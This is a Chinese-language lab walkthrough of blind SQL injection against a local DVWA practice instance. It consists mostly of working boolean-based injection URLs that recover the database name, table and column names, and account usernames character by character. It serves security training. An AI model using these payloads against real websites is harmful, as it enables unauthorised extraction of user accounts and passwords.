盲注
猜数据库长度
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3' and LENGTH(DATABASE())=4 --+&Submit=Submit#
User ID exists in the database.
得出database()长度为4
猜解数据库的名字
SELECT ASCII('d');#100
SELECT ASCII('v');#118
SELECT ASCII('w');#119
SELECT ASCII('a');#97
SELECT SUBSTR(DATABASE(),1,1);#d
SELECT SUBSTR(DATABASE(),2,1);#v
SELECT SUBSTR(DATABASE(),3,1);#w
SELECT SUBSTR(DATABASE(),4,1);#a
SELECT ASCII('d')=100;#1
SELECT ASCII('v')=118;#1
SELECT ASCII('w')=119;#1
SELECT ASCII('a')=97;#1
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND ASCII(SUBSTR(DATABASE(),1,1))=99--+&Submit=Submit#
User ID is MISSING from the database.
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND ASCII(SUBSTR(DATABASE(),1,1))=100--+&Submit=Submit#
User ID exists in the database.
得出database()第一个字段是'd'
同理得出第二个字段是'v'...三字段'w'...四字段'a'
得出数据库名database() = 'dvwa'
猜解dvwa数据库中的表个数
SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=1;#0
SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=2;#1
SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=3;#0
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=2)--+&Submit=Submit#
#--> User ID exists in the database.
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=3)--+&Submit=Submit#
#--> User ID is MISSING from the database.
得出dvwa数据库中的表数量为2
猜解dvwa数据库中第一张表表名的第一个字符
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE()LIMIT 0,1),1,1))=102)--+&Submit=Submit#
#--> User ID is MISSING from the database.
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE()LIMIT 0,1),1,1))=103)--+&Submit=Submit#
#--> User ID exists in the database.
得到第一个字符为g
同理得第二个字符
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE()LIMIT 0,1),2,1))=117)--+&Submit=Submit#
#--> User ID exists in the database.
得到第一个字符为u
同理可得表名:guestbook、第二张表:users
猜解dvwa数据库中的users表的字段数
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND ((SELECT COUNT(column_name) FROM information_schema.columns WHERE table_name= 'users' AND TABLE_SCHEMA='dvwa')=8)--+&Submit=Submit#
#--> User ID exists in the database.
得到:users表一共有8个字段
猜解dvwa数据库中的users表的具体字段
#--> limit 6,1 选到user字段
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND(ASCII(SUBSTR((SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'dvwa' AND TABLE_NAME='users' LIMIT 6,1),1,1))=117)--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'dvwa' AND TABLE_NAME='users' LIMIT 6,1),2,1))=115)--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'dvwa' AND TABLE_NAME='users' LIMIT 6,1),3,1))=101)--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'dvwa' AND TABLE_NAME='users' LIMIT 6,1),4,1))=114)--+&Submit=Submit#
#--> User ID exists in the database.
SELECT ASCII('u');#117
SELECT ASCII('s');#115
SELECT ASCII('e');#101
SELECT ASCII('r');#114
#--> 得到users表的字段user
同上得到users表的字段password
猜解users表中的user字段值
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND length(substr((select user from users limit 0,1),1))=5--+&Submit=Submit#
User ID exists in the database.user字段中第1个字段值的字符长度=5
SELECT ASCII('a');#97
SELECT ASCII('d');#100
SELECT ASCII('m');#109
SELECT ASCII('i');#105
SELECT ASCII('n');#110
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),1,1))=97))--+&Submit=Submit#
#第一个字段值的第一个字符a
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),2,1))=100))--+&Submit=Submit#
#第一个字段值的第二个字符d
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),3,1))=109))--+&Submit=Submit#
#第一个字段值的第三个字符m
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),4,1))=105))--+&Submit=Submit#
#第一个字段值的第四个字符i
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),5,1))=110))--+&Submit=Submit#
#第一个字段值的第五个字符n
组合得到:admin
同理可得user字段第二个值(SELECT USER FROM users LIMIT 1,1),再尝试得到:Gordonb
同上,猜解users表中的password字段值。
结束。